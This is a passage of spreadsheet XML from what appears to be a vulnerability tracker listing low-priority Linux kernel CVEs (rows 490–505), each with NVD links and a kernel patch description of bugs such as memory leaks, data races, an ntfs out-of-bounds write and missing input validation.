visconti_clk_register_gate() fills in init.parent_data, and assumes that
init.parent_names is NULL.  However, the latter in uninitialized, and
thus may cause a crash.
Make sure all members are fully initialized, to fix such bugs, and to
avoid future breakage when converting drivers to a different method for
specifying the parents.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90122</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90123</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2026-09-17</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr"/>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/ast2700-intc: Avoid allocating in the irq_domain activate() callback
The interrupt core calls the irq_domain_activate() callback from
__setup_irq() with desc-&gt;lock held and interrupts disabled. Both
aspeed_intc1_irq_domain_activate() and aspeed_intc0_resolve_route() test a
compatible string with fwnode_device_is_compatible().
fwnode_device_is_compatible() invokes fwnode_property_match_string(), which
allocates with GFP_KERNEL. That's obviously not possible with interrupts
disabled and a raw spinlock held.
Both call sites are only ever handed OF nodes, so use
of_device_is_compatible() instead: it walks the property in place and does
not allocate.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90123</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90124</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2026-09-17</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr"/>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/renesas-rzg2l: Fix loss of interrupt
rzg2l_clear_irq_int() and rzg2l_clear_tint_int() perform a
read-modify-write on the ISCR/TSCR status registers to clear the bit
for the interrupt just handled. Since these registers are
write-0-to-clear per bit, this is racy:
If another interrupt's status bit gets set between the read and the write,
that bit is written back as 0 by the software-constructed value, clearing
an interrupt that hasn't been serviced yet and losing it.
This can be reproduced by triggering multiple interrupts at once, e.g.:
  gpioset -c gpiochip0 355=0 353=0 328=0 352=0
Fix this by writing back only the bit being cleared, with all other bits
set to 1, instead of read-modify-writing the whole register.  Since 1-bits
are left unchanged by hardware, concurrently-set status bits for other
interrupts are preserved.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90124</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90125</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2026-09-17</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr"/>
      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix request buffer leak in smb2_new_read_req()
smb2_new_read_req() allocates the request buffer with
smb2_plain_req_init() but only publishes it to the caller with
*buf = req at the very end of the function. Two error returns sit in
between:
	rc = smb2_plain_req_init(SMB2_READ, io_parms-&gt;tcon, server,
				 (void **) &amp;req, total_len);
	if (rc)
		return rc;
	if (server == NULL)
		return -ECONNABORTED;
	[...]
		rdata-&gt;mr = smbd_register_mr(server-&gt;smbd_conn,
					     &amp;rdata-&gt;subreq.io_iter,
					     true, need_invalidate);
		if (!rdata-&gt;mr)
			return -EAGAIN;
On either of them the buffer is neither released nor handed back, so
it is leaked. The caller cannot clean up after it: smb2_async_readv()
does 'goto out' on a non-zero return, which skips the
cifs_small_buf_release(buf) at async_readv_out, and buf has not been
assigned at that point in any case.
The write path has never had this problem. smb2_async_writev()
registers the memory region inline and jumps to its release label
instead of returning:
	wdata-&gt;mr = smbd_register_mr(...);
	if (!wdata-&gt;mr) {
		rc = -EAGAIN;
		goto async_writev_out;
	}
Commit b7972092199f ("cifs: smbd: Retry on memory registration
failure") changed both sides from -ENOBUFS to -EAGAIN in a single
patch, which puts the two shapes next to each other.
Only the -EAGAIN return is reachable in practice, because
smb2_plain_req_init() calls smb2_reconnect() first and that already
fails with -EIO when server is NULL, before anything is allocated.
Both returns are given the same treatment here rather than leaving
one of them correct only by accident.
Because -EAGAIN is a replayable error, the failure also reaches the
retry block at the end of smb2_async_readv(), which marks the
subrequest NETFS_SREQ_NEED_RETRY, so a failing registration can be
retried rather than ending the I/O, and every attempt that reaches it
leaks another buffer. smb2_should_replay() short-circuits on
tcon-&gt;retry, so on a hard mount the attempt count is not bounded by
the retrans setting.
Only the asynchronous read path is affected. The synchronous
SMB2_read() caller passes rdata == NULL and the memory registration
block is guarded on rdata.
The memory registration failure path was pointed out by the Sashiko
AI reviewer while it was reviewing an unrelated patch to
smb2_async_readv().</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90125</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90126</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2026-09-17</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr"/>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rtc: pcf8563: fix clock provider leak on unbind
pcf8563_clkout_register_clk() registers the CLKOUT clock provider with
of_clk_add_provider(), but nothing ever unwinds it: there is no
of_clk_del_provider() call and the driver has no remove callback. Each
of_clk_add_provider() allocates a struct of_clk_provider, takes a
reference on the OF node and adds an entry to the global of_clk_providers
list, none of which is released when the device is unbound. Every
bind/unbind (or module reload) therefore leaks a provider structure and
an of_node reference.
The clock itself is already device-managed (devm_clk_register()); only
the provider registration was not. Use devm_of_clk_add_hw_provider() so
the provider is removed automatically on unbind. Tie it to the parent
i2c device, whose OF node carries the #clock-cells and clock-output-names
properties (the RTC class device has no OF node of its own).</t>
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90126</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90127</t>
        </is>
      </c>
      <c r="D495" s="5" t="inlineStr"/>
      <c r="E495" s="5" t="inlineStr"/>
      <c r="F495" s="5" t="inlineStr"/>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr"/>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio: rtc: time out alarm requests
RTC class operations run with rtc_device.ops_lock held. The virtio RTC
alarm requests currently wait without a timeout for the device to return
their requestq buffers.
On surprise removal, virtio-pci marks the virtqueues broken before
unregistering the virtio device. If an alarm request is waiting when the
device stops responding, viortc_remove() blocks in viortc_class_stop()
while trying to acquire ops_lock. The request cannot complete and device
removal hangs until the waiting task is signalled.
Use the same 60-second timeout as clock read requests for alarm reads,
alarm programming, and alarm interrupt enable requests. The existing
message reference counting keeps a timed-out request alive until a late
response or device teardown.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90127</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90128</t>
        </is>
      </c>
      <c r="D496" s="5" t="inlineStr"/>
      <c r="E496" s="5" t="inlineStr"/>
      <c r="F496" s="5" t="inlineStr"/>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr"/>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa/mlx5: fix wrong list iterated in add_direct_chain error path
In add_direct_chain(), newly allocated direct MR entries are added to
the local list 'tmp', which is spliced into mr-&gt;head only on success.
On the error path, the cleanup loop was incorrectly iterating over
mr-&gt;head instead of tmp.
Fix by iterating over 'tmp' in the err_alloc cleanup path.</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90128</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90129</t>
        </is>
      </c>
      <c r="D497" s="5" t="inlineStr"/>
      <c r="E497" s="5" t="inlineStr"/>
      <c r="F497" s="5" t="inlineStr"/>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr"/>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_balloon: quiesce balloon work before device shutdown
Commit 8bd2fa086a04 ("virtio: break and reset virtio devices on
device_shutdown()") added a generic virtio bus .shutdown handler that
breaks and resets every virtio device during device_shutdown(), i.e. on
reboot and kexec.
virtio_balloon provides no .shutdown of its own, so that generic path
runs while the balloon's asynchronous work is still armed. Once the
device has been broken, virtqueue_add_inbuf() in
virtballoon_free_page_report() returns -EIO and trips its
WARN_ON_ONCE(). On a kernel booted with panic_on_warn that turns an
ordinary reboot, for example a kexec based upgrade, into a fatal panic
in the middle of device_shutdown(), so the machine never reaches the
new kernel.
Relaxing that single WARN_ON_ONCE() would only hide the symptom: the
inflate/deflate and OOM paths do not warn, they call
wait_event(vb-&gt;acked, ...) and would instead block forever on a broken
queue that can no longer complete. The device has to be quiesced, not
just kept quiet.
Add a .shutdown handler that quiesces the balloon via the shared
virtballoon_quiesce() helper while the device is still alive, and only
then breaks and resets it via virtio_device_shutdown(). Unlike
virtballoon_remove() the balloon workqueue is not destroyed, as shutdown
does not free the device and cancel_work_sync() together with stop_update
already prevent any further work from being queued.</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90129</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90130</t>
        </is>
      </c>
      <c r="D498" s="5" t="inlineStr"/>
      <c r="E498" s="5" t="inlineStr"/>
      <c r="F498" s="5" t="inlineStr"/>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr"/>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim: fix cleanup after worker creation failure
vdpasim_create() leaves vdpasim-&gt;worker as an ERR_PTR when
kthread_run_worker() fails. The error path then drops the device
reference, which releases the partially initialized simulator.
vdpasim_free() unconditionally passes the worker pointer to
kthread_destroy_worker(), so the ERR_PTR is dereferenced and can trigger
a general protection fault.
Store the worker error, clear the pointer, and only clean up the worker
when it was successfully initialized. Also make the release path tolerate
partially initialized objects by guarding virtqueue and IOTLB cleanup,
since the same release path can be reached from other initialization
failures.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90130</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90131</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2026-09-17</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr"/>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: serialize resident iomap reads with mrec_lock
ntfs_read_iomap_begin_resident() walks the MFT record through
ntfs_attr_lookup() -&gt; ntfs_attr_find() without taking ni-&gt;mrec_lock,
while ntfs_attr_record_resize(), ntfs_make_room_for_attr() and
ntfs_resident_attr_record_add() memmove() the same base_ni-&gt;mrec buffer
under that lock. map_mft_record() only takes a reference and does not
serialize, so the reader can observe torn attribute length and offset
fields while a writer is relocating the records.
KCSAN reports the race between the mmap read fault path and both link()
and unlink():
  BUG: KCSAN: data-race in ntfs_attr_find / ntfs_attr_record_resize
  write to 0xffff888100af1018 of 4 bytes by task 96 on cpu 1:
   ntfs_attr_record_resize+0xd2/0x130
   ntfs_attr_record_rm+0xad/0x530
   ntfs_delete+0x224/0x640
   ntfs_unlink+0x14d/0x280
   vfs_unlink+0x157/0x520
  read to 0xffff888100af1018 of 4 bytes by task 95 on cpu 0:
   ntfs_attr_find+0x104/0x5b0
   ntfs_attr_lookup+0x39c/0x10c0
   ntfs_read_iomap_begin_resident+0xc6/0x230
   ntfs_read_iomap_begin+0x5d/0xa0
   iomap_iter+0x2e2/0x6e0
   iomap_read_folio+0x147/0x2a0
   ntfs_read_folio+0x108/0x170
   filemap_read_folio+0x35/0x100
   filemap_fault+0x993/0x1000
  value changed: 0x00000250 -&gt; 0x000001f0
The address is mrec + 0x18, i.e. mft_record.bytes_in_use, and the change
is the 96 bytes of one $FILE_NAME attribute being removed.
Keep base_ni-&gt;mrec_lock from the resident read iomap lookup through
iomap_end(). This protects both the attribute walk and the subsequent copy
from iomap-&gt;inline_data, which points into the MFT record. The non-resident
path is left alone: ntfs_lookup() already holds the directory inode's
mrec_lock when it reads an index folio through read_mapping_folio(), and
taking the lock in the shared wrapper deadlocks there with recursive locking
on mrec_lock. The comment above the read_mapping_folio() call in
fs/ntfs/dir.c notes the same hazard.
The seek path uses the same lookup helper but does not dereference
iomap-&gt;inline_data. Release the lock before returning from that path,
whereas the regular read path records base_ni in iomap-&gt;private and releases
the lock from its iomap_end() callback.
Tested with a reproducer that faults in a 16-byte resident file while
another thread runs link()/unlink() on it. Before: 40 KCSAN reports in
about one second. After: no reports in 180 seconds over 206,090 read
iterations and 423,540 link/unlink cycles. A PROVE_LOCKING build shows no
lockdep splat with the same reproducer running for 60 seconds.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90131</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90132</t>
        </is>
      </c>
      <c r="D500" s="5" t="inlineStr"/>
      <c r="E500" s="5" t="inlineStr"/>
      <c r="F500" s="5" t="inlineStr"/>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr"/>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: reject unprivileged writes to reserved $LX* xattrs
Reject setxattr of the reserved $LXUID, $LXGID, $LXMOD and $LXDEV names
from userspace unless the caller has CAP_SYS_ADMIN.</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90132</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90133</t>
        </is>
      </c>
      <c r="D501" s="5" t="inlineStr"/>
      <c r="E501" s="5" t="inlineStr"/>
      <c r="F501" s="5" t="inlineStr"/>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr"/>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: Fix index_root heap OOB write in ntfs_ir_to_ib()
ntfs_ir_to_ib copies all entries from index_root into a freshly allocated
index_block_size-byte buffer without verifying that the entries fit in the
available space. The entries in index_root may be larger than the usable
entry space in the index block.
This can cause OOB writes past the end of the allocation.
The validator ntfs_index_root_inconsistent() checks that entries are
self-consistent within the IR value, but never cross-checks them against
index_block_size. There is no bounds check in ntfs_ir_to_ib() before the
memcpy.
Fixing this at the sink in ntfs_ir_to_ib() since
ntfs_index_root_inconsistent() validates the logical consistency of
index_root as a structure and a root with large entries is a structurally
valid root. The bug is a size conflict of ntfs_ir_to_ib().
Also, the validator is called once per inode load in
ntfs_read_locked_inode() while ntfs_ir_to_ib() is only called during a
reparent, a check there adds no overhead to the common path.
Moreover, even a future call path that bypasses the validator would still
be protected.
With NULL as first parameter of ntfs_error(), the volume error flag is
never set by this call, so the device name will be absent from the error
message. In any case, that the caller, ntfs_ir_reparent(), prints an error
message that includes the device name on NULL returns.
I think this is the best solution available without adding
'struct super_block *sb' as a parameter to ntfs_ir_to_ib().
This heap out-of-bounds write is triggered by a crafted filesystem image,
which is not in the kernel threat model, anyway, fixing memory errors would
be nice to keep  things secure.</t>
        </is>
      </c>
      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90133</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90134</t>
        </is>
      </c>
      <c r="D502" s="5" t="inlineStr"/>
      <c r="E502" s="5" t="inlineStr"/>
      <c r="F502" s="5" t="inlineStr"/>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr"/>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: fix kmap_local_page() usage in compress
Several compressed I/O paths discard the address returned by
kmap_local_page() and later access or unmap the page using page_address().
This is invalid for highmem pages, and local mappings must also be unmapped
using the address returned by kmap_local_page().
Map each destination page in ntfs_decompress() only while producing the
current sub-block. Use memcpy_from_page(), memcpy_to_page(), and
memzero_page() for the other page accesses. Remove unnecessary local
mappings from ntfs_write_cb(), where pages are accessed through the vmap()
mapping.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90134</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90135</t>
        </is>
      </c>
      <c r="D503" s="5" t="inlineStr"/>
      <c r="E503" s="5" t="inlineStr"/>
      <c r="F503" s="5" t="inlineStr"/>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr"/>
      <c r="S503" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: add missing ref_tracker_dir_exit() to alloc_netdev_mqs()
sashiko is reporting that trying to read /sys/kernel/debug/ref_tracker/*
causes use-afer-free crash when either alloc_percpu() or dev_addr_init()
in alloc_netdev_mqs() failed, for commit 4d92b95ff2f9 ("net: add net device
refcount tracker infrastructure") added ref_tracker_dir_exit() to only
free_netdev() path.</t>
        </is>
      </c>
      <c r="T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90135</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90136</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2026-09-17</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr"/>
      <c r="S504" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86/amd/hsmp: Reject negative power cap writes in hwmon
hsmp_hwmon_write() takes the user-supplied hwmon value as a signed long
and assigns "val / MICROWATT_PER_MILLIWATT" to msg.args[0], which is a
__u32.  MICROWATT_PER_MILLIWATT is an unsigned long, so a negative write
to power1_cap (e.g. "echo -1 &gt; power1_cap") is first converted to a huge
unsigned value by the division and then stored into the u32 argument.
As a result a nonsensical, multi-gigawatt socket power limit is sent to
the SMU via HSMP_SET_SOCKET_POWER_LIMIT instead of the write being
rejected.
Reject negative values with -EINVAL before the conversion.
Tested with HSMP enabled:
  CAP=$(dirname $(grep -l amd_hsmp_hwmon \
        /sys/class/hwmon/hwmon*/name | head -1))/power1_cap
  # negative write
  echo -1000000 &gt; $CAP ; echo "ret=$?"
  # valid positive write must still work
  echo 400000000 &gt; $CAP ; echo "ret=$?"
Before:
  # echo -1000000 &gt; $CAP ; echo "ret=$?"
  ret=0                             &lt;- accepted; bogus limit sent to SMU
  # echo 400000000 &gt; $CAP ; echo "ret=$?"
  ret=0
After:
  # echo -1000000 &gt; $CAP ; echo "ret=$?"
  bash: echo: write error: Invalid argument
  ret=1                             &lt;- rejected with -EINVAL
  # echo 400000000 &gt; $CAP ; echo "ret=$?"
  ret=0                             &lt;- valid write still works</t>
        </is>
      </c>
      <c r="T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90136</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90137</t>
        </is>
      </c>
      <c r="D505" s="5" t="inlineStr"/>
      <c r="E505" s="5" t="inlineStr"/>
      <c r="F505" s="5" t="inlineStr"/>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
